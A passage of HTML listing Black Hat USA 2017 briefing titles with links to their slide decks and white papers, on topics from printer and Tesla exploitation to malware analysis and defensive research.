&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Kettle-Cracking-The-Lens-Exploiting-HTTPs-Hidden-Attack-Surface-tool.zip"&gt;Kettle-Cracking-The-Lens-Exploiting-HTTPs-Hidden-Attack-Surface-tool.zip&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Cyber Wargaming: Lessons Learned in Influencing Security Stakeholders Inside and Outside Your Organization

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Nichols-Cyber-Wargaming-Lessons-Learned-In-Influencing-Stakeholders-Inside-And-Outside-Your-Organization.pdf"&gt;Nichols-Cyber-Wargaming-Lessons-Learned-In-Influencing-Stakeholders-Inside-And-Outside-Your-Organization.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Nichols-Cyber-Wargaming-Lessons-Learned-In-Influencing-Stakeholders-Inside-And-Outside-Your-Organization-wp.pdf"&gt;Nichols-Cyber-Wargaming-Lessons-Learned-In-Influencing-Stakeholders-Inside-And-Outside-Your-Organization-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Datacenter Orchestration Security and Insecurity: Assessing Kubernetes Mesos and Docker at Scale&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Defeating Samsung KNOX with Zero Privilege

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Shen-Defeating-Samsung-KNOX-With-Zero-Privilege.pdf"&gt;Shen-Defeating-Samsung-KNOX-With-Zero-Privilege.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Shen-Defeating-Samsung-KNOX-With-Zero-Privilege-wp.pdf"&gt;Shen-Defeating-Samsung-KNOX-With-Zero-Privilege-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Delivering Javascript to World+Dog

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Randolph-Delivering-Javascript-to-World-Plus-Dog.pdf"&gt;Randolph-Delivering-Javascript-to-World-Plus-Dog.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Randolph-Delivering-Javascript-to-World-Plus-Dog-wp.pdf"&gt;Randolph-Delivering-Javascript-to-World-Plus-Dog-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Developing Trust and Gitting Betrayed&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Digital Vengeance: Exploiting the Most Notorious C&amp;amp;C Toolkits

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Grange-Digital-Vengeance-Exploiting-The-Most-Notorious-C&amp;amp;C-Toolkits.pdf"&gt;Grange-Digital-Vengeance-Exploiting-The-Most-Notorious-C&amp;amp;C-Toolkits.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Grange-Digital-Vengeance-Exploiting-The-Most-Notorious-C&amp;amp;C-Toolkits-wp.pdf"&gt;Grange-Digital-Vengeance-Exploiting-The-Most-Notorious-C&amp;amp;C-Toolkits-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Don’t Trust the DOM: Bypassing XSS Mitigations via Script Gadgets

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf"&gt;Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Electronegativity - A Study of Electron Security

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf"&gt;Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security-wp.pdf"&gt;Carettoni-Electronegativity-A-Study-Of-Electron-Security-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Escalating Insider Threats Using VMware’s API

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Ziv-Escalating-Insider-Threats-Using-Vmware%27s-Api.pdf"&gt;Ziv-Escalating-Insider-Threats-Using-Vmware’s-Api.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Evading Microsoft ATA for Active Directory Domination

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Mittal-Evading-MicrosoftATA-for-ActiveDirectory-Domination.pdf"&gt;Mittal-Evading-MicrosoftATA-for-ActiveDirectory-Domination.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Evil Bubbles or How to Deliver Attack Payload via the Physics of the Process&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Evilsploit – A Universal Hardware Hacking Toolkit

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Chui-Evilsploit-A-Universal-Hardware-Hacking-Toolkit.pdf"&gt;Chui-Evilsploit-A-Universal-Hardware-Hacking-Toolkit.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Chui-Evilsploit-A-Universal-Hardware-Hacking-Toolkit-wp.pdf"&gt;Chui-Evilsploit-A-Universal-Hardware-Hacking-Toolkit-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Evolutionary Kernel Fuzzing

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Johnson-Evolutionary-Kernel-Fuzzing"&gt;Johnson-Evolutionary-Kernel-Fuzzing&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Exploit Kit Cornucopia&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Exploiting Network Printers

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Mueller-Exploiting-Network-Printers.pdf"&gt;Mueller-Exploiting-Network-Printers.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Fad or Future? Getting Past the Bug Bounty Hype&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Fighting Targeted Malware in the Mobile Ecosystem

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Ruthven-Fighting-Targeted-Malware-In-The-Mobile-Ecosystem.pdf"&gt;Ruthven-Fighting-Targeted-Malware-In-The-Mobile-Ecosystem.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Fighting the Previous War (aka: Attacking and Defending in the Era of the Cloud)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Firmware is the New Black - Analyzing Past Three Years of BIOS/UEFI Security Vulnerabilities&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;FlowFuzz - A Framework for Fuzzing OpenFlow-Enabled Software and Hardware Switches

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Gray-FlowFuzz-A-Framework-For-Fuzzing-OpenFlow-Enabled-Software-And-Hardware-Switches.pdf"&gt;Gray-FlowFuzz-A-Framework-For-Fuzzing-OpenFlow-Enabled-Software-And-Hardware-Switches.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Fractured Backbone: Breaking Modern OS Defenses with Firmware Attacks&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Free-Fall: Hacking Tesla from Wireless to CAN Bus

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Nie-Free-Fall-Hacking-Tesla-From-Wireless-To-CAN-Bus.pdf"&gt;Nie-Free-Fall-Hacking-Tesla-From-Wireless-To-CAN-Bus.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Nie-Free-Fall-Hacking-Tesla-From-Wireless-To-CAN-Bus-wp.pdf"&gt;Nie-Free-Fall-Hacking-Tesla-From-Wireless-To-CAN-Bus-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Friday the 13th: JSON Attacks

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf"&gt;Munoz-Friday-The-13th-Json-Attacks.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf"&gt;Munoz-Friday-The-13th-JSON-Attacks-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Game of Chromes: Owning the Web with Zombie Chrome Extensions

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions-wp.pdf"&gt;Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions-wp.pdf"&gt;Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Garbage In Garbage Out: How Purportedly Great Machine Learning Models can be Screwed Up by Bad Data

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Sanders-Garbage-In-Garbage-Out-How-Purportedly-Great-ML-Models-Can-Be-Screwed-Up-By-Bad-Data.pdf"&gt;Sanders-Garbage-In-Garbage-Out-How-Purportedly-Great-ML-Models-Can-Be-Screwed-Up-By-Bad-Data.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Sanders-Garbage-In-Garbage-Out-How-Purportedly-Great-ML-Models-Can-Be-Screwed-Up-By-Bad-Data-wp.pdf"&gt;Sanders-Garbage-In-Garbage-Out-How-Purportedly-Great-ML-Models-Can-Be-Screwed-Up-By-Bad-Data-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Go Nuclear: Breaking Radiation Monitoring Devices

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Santamarta-Go-Nuclear-Breaking%20Radition-Monitoring-Devices.pdf"&gt;Santamarta-Go-Nuclear-Breaking Radition-Monitoring-Devices.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Santamarta-Go-Nuclear-Breaking%20Radition-Monitoring-Devices-wp.pdf"&gt;Santamarta-Go-Nuclear-Breaking Radition-Monitoring-Devices-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Go to Hunt Then Sleep

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Bianco-Go-To-Hunt-Then-Sleep.pdf"&gt;Bianco-Go-To-Hunt-Then-Sleep.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Hacking Hardware with a $10 SD Card Reader

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Etemadieh-Hacking-Hardware-With-A-$10-SD-Card-Reader.pdf"&gt;Etemadieh-Hacking-Hardware-With-A-$10-SD-Card-Reader.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Etemadieh-Hacking-Hardware-With-A-$10-SD-Card-Reader-wp.pdf"&gt;Etemadieh-Hacking-Hardware-With-A-$10-SD-Card-Reader-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Hacking Serverless Runtimes: Profiling AWS Lambda Azure Functions and More

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Krug-Hacking-Severless-Runtimes.pdf"&gt;Krug-Hacking-Severless-Runtimes.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Krug-Hacking-Severless-Runtimes-wp.pdf"&gt;Krug-Hacking-Severless-Runtimes-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Honey I Shrunk the Attack Surface – Adventures in Android Security Hardening&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;How We Created the First SHA-1 Collision and What it Means for Hash Security&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Hunting GPS Jammers

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Gostomelsky-Hunting-GPS-Jammers.pdf"&gt;Gostomelsky-Hunting-GPS-Jammers.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Ice Cream Social (Sponsored by Code42 Software Core Security 
Cybereason Darktrace F5 Networks iboss Malwarebytes &amp;amp; Optiv 
Security)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Ichthyology: Phishing as a Science

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Burnett-Ichthyology-Phishing-As-A-Science.pdf"&gt;Burnett-Ichthyology-Phishing-As-A-Science.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Burnett-Ichthyology-Phishing-As-A-Science-wp.pdf"&gt;Burnett-Ichthyology-Phishing-As-A-Science-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Industroyer/Crashoverride: Zero Things Cool About a Threat Group Targeting the Power Grid

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Lee-Industroyer-Crashoverride-Zero-Things-Cool-About-A-Threat-Group-Targeting-The-Power-Grid.pdf"&gt;Lee-Industroyer-Crashoverride-Zero-Things-Cool-About-A-Threat-Group-Targeting-The-Power-Grid.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Infecting the Enterprise: Abusing Office365+Powershell for Covert C2

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf"&gt;Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Influencing the Market to Improve Security

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Nakibly-Automated-Detection-of-Vulnerabilities-in-Black-Box-Routers.pdf"&gt;Nakibly-Automated-Detection-of-Vulnerabilities-in-Black-Box-Routers.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Nakibly-Automated-Detection-of-Vulnerabilities-in-Black-Box-Routers-wp.pdf"&gt;Nakibly-Automated-Detection-of-Vulnerabilities-in-Black-Box-Routers-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Intel AMT Stealth Breakthrough

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Evdokimov-Intel-AMT-Stealth-Breakthrough.pdf"&gt;Evdokimov-Intel-AMT-Stealth-Breakthrough.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Evdokimov-Intel-AMT-Stealth-Breakthrough-wp.pdf"&gt;Evdokimov-Intel-AMT-Stealth-Breakthrough-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Intel SGX Remote Attestation is Not Sufficient

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Swami-SGX-Remote-Attestation-Is-Not-Sufficient-wp.pdf"&gt;Swami-SGX-Remote-Attestation-Is-Not-Sufficient-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Swami-SGX-Remote-Attestation-Is-Not-Sufficient-wp.pdf"&gt;Swami-SGX-Remote-Attestation-Is-Not-Sufficient-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Intercepting iCloud Keychain

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Radocea-Intercepting-iCloud-Keychain.pdf"&gt;Radocea-Intercepting-iCloud-Keychain.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;IoTCandyJar: Towards an Intelligent-Interaction Honeypot for IoT Devices

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Luo-Iotcandyjar-Towards-An-Intelligent-Interaction-Honeypot-For-IoT-Devices.pdf"&gt;Luo-Iotcandyjar-Towards-An-Intelligent-Interaction-Honeypot-For-IoT-Devices.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Luo-Iotcandyjar-Towards-An-Intelligent-Interaction-Honeypot-For-IoT-Devices-wp.pdf"&gt;Luo-Iotcandyjar-Towards-An-Intelligent-Interaction-Honeypot-For-IoT-Devices-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;kR^X: Comprehensive Kernel Protection Against Just-In-Time Code Reuse

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Pomonis-KR%5EX-%20Comprehensive-%20Kernel-Protection-Against-Just-In-Time-Code-Reuse.pdf"&gt;Pomonis-KR^X- Comprehensive- Kernel-Protection-Against-Just-In-Time-Code-Reuse.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Lies and Damn Lies: Getting Past the Hype of Endpoint Security Solutions

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Giuliano-Lies-And-Damn-Lies-Getting-Past-The-Hype-Of-Endpoint-Security-Solutions.pdf"&gt;Giuliano-Lies-And-Damn-Lies-Getting-Past-The-Hype-Of-Endpoint-Security-Solutions.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Lunch Break (Sponsored by Cisco Forcepoint LogRhythm &amp;amp; RSA)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Many Birds One Stone: Exploiting a Single SQLite Vulnerability Across Multiple Software

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Feng-Many-Birds-One-Stone-Exploiting-A-Single-SQLite-Vulnerability-Across-Multiple-Software.pdf"&gt;Feng-Many-Birds-One-Stone-Exploiting-A-Single-SQLite-Vulnerability-Across-Multiple-Software.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Mimosa Bar (Sponsored by AlienVault Arbor Networks Carbon Black CrowdStrike Cylance DarkMatter Digital Guardian &amp;amp; IBM)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Network Automation is Not Your Safe Haven: Protocol Analysis and Vulnerabilities of Autonomic Network

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Eissa-Network-Automation-Isn%27t-Your-Safe-Haven-Protocol-Analysis-And-Vulnerabilities-Of-Autonomic-Network.pdf"&gt;Eissa-Network-Automation-Isn’t-Your-Safe-Haven-Protocol-Analysis-And-Vulnerabilities-Of-Autonomic-Network.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;New Adventures in Spying 3G and 4G Users: Locate Track &amp;amp; Monitor

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Borgaonkar-New-Adventures-In-Spying-3G-And-4G-Users-Locate-Track-And-Monitor.pdf"&gt;Borgaonkar-New-Adventures-In-Spying-3G-And-4G-Users-Locate-Track-And-Monitor.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Ochko123 - How the Feds Caught Russian Mega-Carder Roman Seleznev&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Offensive Malware Analysis: Dissecting OSX/FruitFly via a Custom C&amp;amp;C Server

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Wardle-Offensive-Malware-Analysis-Dissecting-OSXFruitFly-Via-A-Custom-C&amp;amp;C-Server.pdf"&gt;Wardle-Offensive-Malware-Analysis-Dissecting-OSXFruitFly-Via-A-Custom-C&amp;amp;C-Server.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;OpenCrypto: Unchaining the JavaCard Ecosystem

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Mavroudis-Opencrypto-Unchaining-The-JavaCard-Ecosystem.pdf"&gt;Mavroudis-Opencrypto-Unchaining-The-JavaCard-Ecosystem.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Orange is the New Purple - How and Why to Integrate Development Teams with Red/Blue Teams to Build More Secure Software

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Wright-Orange-Is-The-New-Purple.pdf"&gt;Wright-Orange-Is-The-New-Purple.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Wright-Orange-Is-The-New-Purple-wp.pdf"&gt;Wright-Orange-Is-The-New-Purple-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;PEIMA: Harnessing Power Laws to Detect Malicious Activities from 
Denial of Service to Intrusion Detection Traffic Analysis and Beyond&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Practical Tips for Defending Web Applications in the Age of DevOps

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Lackey-Practical%20Tips-for-Defending-Web-Applications-in-the-Age-of-DevOps.pdf"&gt;Lackey-Practical Tips-for-Defending-Web-Applications-in-the-Age-of-DevOps.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Protecting Pentests: Recommendations for Performing More Secure Tests

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-McGrew-Protecting-Pentests-Recommendations-For-Performing-More-Secure-Tests.pdf"&gt;McGrew-Protecting-Pentests-Recommendations-For-Performing-More-Secure-Tests.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-McGrew-Protecting-Pentests-Recommendations-For-Performing-More-Secure-Tests-wp.pdf"&gt;McGrew-Protecting-Pentests-Recommendations-For-Performing-More-Secure-Tests-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Protecting Visual Assets: Digital Image Counter-Forensics

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Mazurov-Brown-Protecting-Visual-Assets-Digital-Image-Counter-Forensics.pdf"&gt;Mazurov-Brown-Protecting-Visual-Assets-Digital-Image-Counter-Forensics.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Pwnie Awards&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Quantifying Risk in Consumer Software at Scale - Consumer Reports’ Digital Standard&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;RBN Reloaded - Amplifying Signals from the Underground&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Real Humans Simulated Attacks: Usability Testing with Attack Scenarios

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Cranor-Real-Users-Simulated-Attacks.pdf"&gt;Cranor-Real-Users-Simulated-Attacks.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Redesigning PKI to Solve Revocation Expiration and Rotation Problems

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Knopf-Redesigning-PKI-To-Solve-Revocation-Expiration-And-Rotation-Problems.pdf"&gt;Knopf-Redesigning-PKI-To-Solve-Revocation-Expiration-And-Rotation-Problems.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Knopf-Redesigning-PKI-To-Solve-Revocation-Expiration-And-Rotation-Problems-wp.pdf"&gt;Knopf-Redesigning-PKI-To-Solve-Revocation-Expiration-And-Rotation-Problems-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Revoke-Obfuscation: PowerShell Obfuscation Detection (And Evasion) Using Science

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science.pdf"&gt;Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And Evasion-Using-Science.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf"&gt;Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And Evasion-Using-Science-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;rVMI: A New Paradigm for Full System Analysis

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Pfoh-rVMI-A-New-Paradigm-For-Full-System-Analysis.pdf"&gt;Pfoh-rVMI-A-New-Paradigm-For-Full-System-Analysis.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;ShieldFS: The Last Word in Ransomware Resilient File Systems

